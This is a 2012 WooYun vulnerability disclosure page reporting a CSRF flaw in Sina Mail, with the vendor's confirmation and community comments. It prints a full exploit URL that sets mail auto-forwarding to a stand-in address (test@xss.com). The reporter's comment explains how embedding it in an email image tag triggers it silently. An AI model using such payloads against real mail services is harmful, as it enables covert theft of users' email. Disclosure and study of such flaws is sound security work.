当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-014071

漏洞标题:新浪一处搞笑的CSRF,可以窃取用户邮件

相关厂商:新浪

漏洞作者: 苦逼老爷爷

提交时间:2012-10-30 14:20

修复时间:2012-12-14 14:21

公开时间:2012-12-14 14:21

漏洞类型:CSRF

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-10-30: 细节已通知厂商并且等待厂商处理中
2012-10-30: 厂商已经确认,细节仅向厂商公开
2012-11-09: 细节向核心白帽子及相关领域专家公开
2012-11-19: 细节向普通白帽子公开
2012-11-29: 细节向实习白帽子公开
2012-12-14: 细节向公众公开

简要描述:

这几天,把SINA/SOHU/163通通CSRF了一遍。。国内普通不重视CSRF啊。
为什么说这个搞笑呢? 因为形式上,这个链接是做了CSRF防范的,可事实上。。。

详细说明:

可以修改用户邮箱设置,而且可以使用GET方式。所以,攻击者可以直接<IMG SRC=xxx>发封邮件给对方,对方只要一看到这封邮件即刻中标。
我的demo中是把用户邮件全转到一个指定邮箱。。。当然,还可以干别的设置。所以,这个算相当高危的吧。。。
话说,你们那TOKEN......和尚头上的虱子啊.....
http://m1.mail.sina.com.cn/wa.php?a=update_setting&ListNum=20&forword_mode=3&signtext=%3CDIV%3E%26nbsp%3B%3CBR%3E%3C%2FDIV%3E&AddAddr=1&AddOut=1&ReplyInc=0&ReSubLang=CHE&autore=0&autofo=1&forwordemail=test@xss.com&ShowMailSize=0&normalSign=0&vcardSign=0&weiboSign=0&autoreic=0&weibonotify=0&autoretext=&token=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

漏洞证明:


修复方案:

token啊token

版权声明:转载请注明来源 苦逼老爷爷@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-10-30 16:10

厂商回复:

感谢提供,马上跟进处理。

最新状态:

暂无


漏洞评价:

评论

  1. 2012-10-30 14:22 | 瘦蛟舞 认证白帽子 ( 普通白帽子 | Rank:687 漏洞数:78 | 铁甲依然在)

    洞主要CSRF超神么。。求带。。

  2. 2012-10-30 14:24 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    求带。。

  3. 2012-10-30 14:26 | promise ( 路人 | Rank:22 漏洞数:4 | 低调的各种路过!!!)

    求 带!!!

  4. 2012-10-30 14:32 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    NB!

  5. 2012-10-30 14:45 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    求 带!!!

  6. 2012-10-30 14:51 | 苦逼老爷爷 ( 普通白帽子 | Rank:211 漏洞数:17 | 用户太懒什么都没留下)

    @疯子 @promise @鬼魅羊羔 @瘦蛟舞 汗,不敢当啊。。。。CSRF嘛,一个个链接检查下去看看有没有二次认证,没含量的啊。。。

  7. 2012-10-30 15:10 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @苦逼老爷爷 那也不行!我们都说求带了,你好意思拒绝啊?

  8. 2012-10-30 16:20 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    @苦逼老爷爷 哥们疯了!厂商也要疯了

  9. 2012-10-30 17:09 | promise ( 路人 | Rank:22 漏洞数:4 | 低调的各种路过!!!)

    @苦逼老爷爷 各种姿势的求,求sql 注入 求ROOT 求脱掉!!!

  10. 2012-10-30 18:51 | shack2 ( 普通白帽子 | Rank:470 漏洞数:71 | QQ:1341413415 一个热爱编程(Java),热爱网...)

    这丫的csrf都被你丫的挖出来了,求指导

  11. 2012-10-30 19:48 | 苦逼老爷爷 ( 普通白帽子 | Rank:211 漏洞数:17 | 用户太懒什么都没留下)

    这个洞受关注的程度超过偶的想象啊。。。求带真的不敢,但只是运气再加了一点仔细而已。刚才检查了一下,SINA已经修复了这个漏洞,所以偶就公开说了吧。CSRF大家都懂的,威力很猛,但技术含量不大,只要仔细检查一下系统有没有进行二次认证即可。SINA的这次问题出在邮箱上,邮箱是CSRF利用的极品,是需要重点关注的,因为邮箱的用户必须登录后才能进行操作,换句话说,只要不使用二次认证同时使用SSO认证,很容易中标。SINA邮箱,修改用户资料,使用了一个链接 wa.php?a=update_setting,同时通过POST传入包括签名/转发/回复等一系列信息,同时也传入了token。CSRF本来是没希望的,但偏偏程序员疏漏,没有对传入的token进行检查,活生生把二次认证变成一次,而这一次已经在邮箱登录完成;另一方面,wa.php虽然系统调用使用POST,但其实是支持GET方式的,而GET方面最好的利用就使用图片标签,而偏偏邮件系统是可以直接使用<img src>方式的嵌入的。于是一个攻击链就形成了,恶意攻击者只需要向受害者发送一封邮件,里面构造一个<img src=".....wa.php?a=update_setting..">的图片,受害者只要打开这邮件,或者预览该邮件,用户信息即被静默地修改了。。。攻击完成。

  12. 2012-10-30 19:52 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    @苦逼老爷爷 原来如此,大概了解了。。多谢了,我们还是这方面的新手,请多指教哈。洞主威武。。

  13. 2012-10-30 20:26 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    @苦逼老爷爷 N.X

  14. 2012-10-30 20:34 | shack2 ( 普通白帽子 | Rank:470 漏洞数:71 | QQ:1341413415 一个热爱编程(Java),热爱网...)

    藐视这个要和xss一起打

  15. 2012-10-30 21:55 | 苦逼老爷爷 ( 普通白帽子 | Rank:211 漏洞数:17 | 用户太懒什么都没留下)

    @shack2 不需要xss的。这个csrf标准得就象教科书上的一样。

  16. 2012-10-31 07:43 | shack2 ( 普通白帽子 | Rank:470 漏洞数:71 | QQ:1341413415 一个热爱编程(Java),热爱网...)

    直接发图片就行,src带上连接就行,哈哈,这个确实很

  17. 2012-11-02 23:55 | Henry:bobo ( 普通白帽子 | Rank:104 漏洞数:22 | 本胖吊!~又高又肥2个奶奶像地雷)

    。。。这个确实狠

  18. 2012-11-03 02:20 | 园长 ( 普通白帽子 | Rank:134 漏洞数:14 | 你在身边就是缘,缘分写在数据库里面。)

    @疯子 菊花残。

  19. 2012-11-09 17:32 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    形同虚设的TOKEN

  20. 2012-11-23 13:13 | 猴子 ( 路人 | Rank:19 漏洞数:5 | 我是一只骚猴子)

    @鬼魅羊羔 CSRF求带啊。55555

  21. 2012-11-30 08:57 | huliang ( 路人 | Rank:12 漏洞数:3 | 过往如昙花一现)

    @苦逼老爷爷 有必要出个工具测测那些带Token的大站是不是否是形同虚设 ###

  22. 2012-12-14 16:22 | guiker ( 路人 | Rank:0 漏洞数:1 | PHP屌丝程序员!)

    确实搞笑

  23. 2012-12-14 17:18 | webshell ( 实习白帽子 | Rank:58 漏洞数:18 | 没有伞的孩子必须努力奔跑。)

    学习了。。其实我之前发的csrf的东东就包含这些。。就看大家会不会利用这些洞洞。。

  24. 2012-12-18 13:24 | Richard ( 路人 | Rank:6 漏洞数:2 )

    膜拜ing...

  25. 2013-01-30 10:06 | rivers ( 实习白帽子 | Rank:85 漏洞数:10 | research on web security)

    csrf,被忽视的炸弹